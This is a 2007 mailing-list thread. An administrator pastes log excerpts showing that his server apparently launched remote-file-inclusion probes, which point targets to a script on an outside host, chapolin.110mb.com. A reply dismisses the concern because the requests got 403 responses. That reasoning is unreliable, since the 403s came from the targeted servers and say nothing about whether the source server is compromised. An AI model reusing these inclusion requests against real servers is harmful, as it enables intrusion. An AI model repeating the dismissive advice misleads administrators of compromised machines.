On Tue, Jul 10, 2007 at 01:55:54AM -0000, rocky wrote: > Hey list, > > Currently, we get some notice about some one is using our server doing > injection attacks against other servers. > > Below are some log files they sent to us > $------------------Snap begin---------------------------$ > our.server.ip.address - - [09/Jul/2007:00:31:43 +0200] "GET > > //.comhttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7414 "-" > > "Mozilla/5.0" > > our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET > > //.infohttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7415 > > "-" "Mozilla/5.0" > > our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET > > //.brhttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7413 "-" > > "Mozilla/5.0" > $----------------snap end---------------------------------$ > > Unfortunately, the person who is in charge of server maintaining is > away now and we can not get hold of him. Can any of you give me some > direction on how to track down the security hole and eliminate it > please? > > Thanks a lot in advance! > Well, if all the requests are getting a 403 response like the ones you have snipped, then I wouldn't worry. The 403 code means "forbidden", so your server is not allowing the access anyways and only logging it. Regards, -Roberto -- Roberto C. Sánchez http://people.connexer.com/~roberto http://www.connexer.com
Attachment:
signature.asc
Description: Digital signature